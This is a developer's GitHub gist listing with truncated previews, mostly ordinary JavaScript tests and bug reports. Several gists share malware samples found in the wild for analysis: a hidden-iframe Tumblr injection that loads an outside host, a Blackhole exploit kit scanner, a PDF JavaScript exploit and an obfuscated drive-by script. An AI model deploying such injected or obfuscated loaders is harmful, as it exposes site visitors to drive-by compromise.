@scottschiller
scottschiller / gist:4196142
Created Dec 3, 2012
Possible Tumblr exploit found in the wild, 12/03/2012
View gist:4196142
<div class="the-video hideflash"><script src="data:text/plain;base64,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"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>
Decoded:
/*
var framekiller = true;
window.onload = function(){
document.getElementById('lapper').src = "http://i.hope.you.get.st
@scottschiller
scottschiller / malware.js
Created Nov 15, 2012
"Blackhole" Flash + Adobe PDF Reader + Java/getJavaInfo.jar web exploit found in the wild, 11/15/2012
View malware.js
/**
* Looks as though this thing scans for vulnerable versions of Flash, Adobe PDF Reader and Java plugins.
* Oddly, the functions j1/j2/p1/p2/f1/f2 (which would presumably do the dirty work) are empty.
* It's worth noting that the hosting (bad) page says "Please wait, you will be forwarded / IE and Firefox-compatible only".
* Allegedly this is part of the "Blackhole Exploit Kit".
* Related details / video etc.:
* http://malwaremustdie.blogspot.com/2012/09/important-blackhole-exploit-kit-starts.html
* http://malware.dontneedcoffee.com/2012/09/BHEK2.0landing.html
*/
View gist:2890589
<!-- Flickr is made of, by and for humans: Here are 17 signs of empathy in the form of loading messages. ;) -->
Reticulating splines...
Frobulating widgets...
Engaging Tuna Blaster...
Firing up the engines...
Buffering...
Herding pandas...
Questioning the Magic Donkey...
Your machine is learning our ways
@scottschiller
scottschiller / yui3-loader-test.html
Created May 8, 2012
YUI 3.5.1 loader test (IE 9, quirks mode DTD)
View yui3-loader-test.html
<!--
Lack of DTD means quirks mode in IE 9, and YUI 3.5.1 will fail to load module dependencies due to <script>.onload not being supported. <script>.onreadystatechange should instead be used when document.documentMode < 9, which means IE 9 rendering a page in quirks mode, IE 7 or IE 8 standards mode.
-->
<html>
<head>
<script src="http://yui.yahooapis.com/3.5.1/build/yui/yui-min.js"></script>
<script>
// Create a YUI sandbox on your page.
YUI().use('node', 'event', function (Y) {
// The Node and Event modules are loaded and ready to use.
@scottschiller
scottschiller / gist:2623390
Created May 6, 2012 — forked from spadgos/gist:2561726
Recreating a SoundManager bug / fixed testcase
View gist:2623390
<html>
<head>
<!--
report URL: https://getsatisfaction.com/schillmania/topics/sound_playing_double
related SM2 fix/commit: https://github.com/scottschiller/SoundManager2/commit/013565dbb5abfc5bf0ab66b0246352ee3ca5cc02
-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Soundmanager test</title>
<!-- you'll have to correct the paths to SoundManager to get it working for yourself -->
<script>window.SM2_DEFER = true;</script>
@scottschiller
scottschiller / gist:2142215
Created Mar 20, 2012
JavaScript PDF exploit found in the wild, 03/20/2012
View gist:2142215
I got this PDF as an email attachment.
The PDF file included a JavaScript block defining an array, and some encoded (for example, &#123;) character entries underneath defining the function responsible for decoding and running it.
The interesting part of the PDF where the script started:
<test:script contentType='&#97;&#0112;plication/&#120;-javascript'>
That was followed by the array data (not encoded), and then this block:
@scottschiller
scottschiller / malware.html
Created Feb 28, 2012
Browser malware found in the wild, 02/28/2012
View malware.html
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
@scottschiller
scottschiller / gist:1187837
Created Sep 2, 2011
Closure compiler "INTERNAL COMPILER ERROR" with soundmanager2-nodebug.js (Compiler version 1346)
View gist:1187837
[ Report for Google Closure Compiler folks, internal compiler error on routinely-compressed JS ]
Source file used:
https://raw.github.com/scottschiller/SoundManager2/V2.97a.20110801+DEV/script/soundmanager2-nodebug.js
Reporting this per instructions in the compiler output.
For what it's worth, compilation has previously been successful until I updated the compiler to the build below.
This version of the compiler fails:
Closure Compiler (http://code.google.com/closure/compiler)
@scottschiller
scottschiller / js-ball-collision.html
Created Jul 10, 2011
A collision-enabled variant of my JavaScript Animation Demo #2, feature added at the request of a public school technology teacher who wrote in. (Teachers showing kids JavaScript in high school FTW! :P)
View js-ball-collision.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<style type="text/css">
body {
font:76% normal verdana,arial,tahoma;
}
@scottschiller
scottschiller / normalized-addremove.html
Created Sep 26, 2010
Somewhat-normalized event listener handling (DOM2)
View normalized-addremove.html
<html>
<head>
<title>Somewhat-normalized event add/remove</title>
<script>
var addEvent, removeEvent;
(function() {
/*
* Somewhat-normalized event add/remove (old IE/W3C)